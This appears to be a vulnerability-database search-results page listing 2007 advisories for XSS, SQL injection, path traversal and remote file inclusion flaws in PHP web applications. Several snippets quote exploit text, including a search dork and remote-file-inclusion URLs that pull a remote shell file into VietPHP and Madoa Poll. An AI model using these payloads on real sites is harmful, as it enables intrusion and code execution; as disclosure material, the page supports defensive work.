7210 matches found
CVE-2007-4178
Cross-site scripting XSS vulnerability in index.php in WebDirector 2.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the deslocal parameter...
VietPHP Remote File Inclusion Vulnerbility
VietPHP Remote File Inclusion Vulnerbility Vuln. code : in: admin/index.php /index.php /functions DoRk: Powered by VietPHP Exploit: www.server.com/path/admin/index.php?language=Sh3LL www.server.com/index.php??language=Sh3LL www.server.com/functions.php?dirpath=Sh3LL...
vietphp-rfi.txt
VietPHP Remote File Inclusion Vulnerbility Vuln. code : in: admin/index.php /index.php /functions DoRk: Powered by VietPHP Exploit: www.server.com/path/admin/index.php?language=Sh3LL www.server.com/index.php??language=Sh3LL www.server.com/functions.php?dirpath=Sh3LL...
WordPress Blue Memories Plugin <= 1.5 - XSS
Because of this vulnerability in index.php, the attackers can inject arbitrary web script or HTML via the "s" parameter. Solution Update the theme...
PT-2007-5361 · Xuyiyang · Blue Memories Theme
Cross-site scripting XSS vulnerability in index.php in the Blue Memories theme 1.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter, possibly a related issue to CVE-2007-2757 and CVE-2007-4014. NOTE: the provenance of this information is unknown; th...
CVE-2007-4156
Multiple SQL injection vulnerabilities in wolioCMS allow remote attackers to execute arbitrary SQL commands via 1 the id parameter to member.php in a page action, related to a SELECT statement in common.php; and the 2 loginid parameter uid variable, and possibly the 3 pwd parameter, to...
Sql injection
Multiple SQL injection vulnerabilities in wolioCMS allow remote attackers to execute arbitrary SQL commands via 1 the id parameter to member.php in a page action, related to a SELECT statement in common.php; and the 2 loginid parameter uid variable, and possibly the 3 pwd parameter, to...
CVE-2007-4156
Multiple SQL injection vulnerabilities in wolioCMS allow remote attackers to execute arbitrary SQL commands via 1 the id parameter to member.php in a page action, related to a SELECT statement in common.php; and the 2 loginid parameter uid variable, and possibly the 3 pwd parameter, to...
CVE-2007-4141
OpenRat CMS 0.8-beta1 and earlier allows remote attackers to obtain sensitive information via a request containing an XSS sequence in the action parameter to index.php, which reveals the path in an error message...
CVE-2007-4117
Affected software: phpWebFileManager 0.5. The issue is described as a PHP remote file inclusion vulnerability in index.php via the PN_PathPrefix parameter, allowing remote code execution. The underlying cause is the handling of PN_PathPrefix in the index.php file, with the note that a reliable th...
PT-2007-5319 · Php · Phpwebfilemanager
Name of the Vulnerable Software and Affected Versions: phpWebFileManager version 0.5 Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the PN PathPrefix parameter in the index.php file. However, this issue is disputed by a reliable third party, who...
woliocms-sql.txt
wolioCMS - SQL Injection and Bypass Administrator Login Vendor : http://www.buton.web.id/member.php?member=anon Download : http://www.buton.web.id/download/woliocms.zip Found By : k1tk4t - k1tk4t4tnewhack.org Location : Indonesia -- newhackdotorg @irc.dal.net Exploit ini berhasil jika...
Madoa Poll v1.1 Remote File Include Vulnerabilities
Madoa Poll v1.1 Remote File Include Vulnerabilities ilker kandemir ilkerkandemiratmynet.com info: / Her$ey Vatan icin / Download: http://www.finnermark.se/madoa/Madoapoll11.zip TnX.: Ajann, Dumenci, H0tTurk, Str0ke Bug: require $Madoa . "config.php"; Exploit: index.php?Madoa=http://sheel.txt?...
Design/Logic Flaw
Webbler CMS before 3.1.6 provides the full installation path within HTML comments in certain documents, which allows remote attackers to obtain sensitive information by viewing the HTML source, as demonstrated by viewing the source generated from index.php...
Sql injection
Multiple SQL injection vulnerabilities in AlstraSoft Affiliate Network Pro allow remote attackers to execute arbitrary SQL commands via 1 the pgmid parameter in an uploadProducts action to merchants/index.php and possibly 2 the rowid parameter to merchants/temp.php...
CVE-2007-4046
SQL injection vulnerability in index.php in the Pony Gallery componygallery 1.5 and earlier component for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter...
CVE-2007-4046
CVE-2007-4046 is a SQL injection vulnerability in the Pony Gallery (com_ponygallery) for Joomla! 1.5 and earlier, exploitable via the catid parameter in index.php. Remote attackers could execute arbitrary SQL commands. Documents confirm affected software and an exploit/disclosure trail (e.g., exp...
CVE-2007-4028
CVE-2007-4028 affects Webspell 4.01.02. A vulnerability in index.php allows absolute path traversal, enabling remote attackers to include and execute arbitrary local files via a full pathname in the site parameter. CVSS v2 base score 7.5 (HIGH): Network vector, no authentication, low attack compl...
CVE-2007-4028
Absolute path traversal vulnerability in index.php in Webspell 4.01.02 allows remote attackers to include and execute arbitrary local files via a full pathname in the site parameter. NOTE: some of these details are obtained from third party information...
Sql injection
SQL injection vulnerability in index.php in bwired allows remote attackers to execute arbitrary SQL commands via the newsID parameter...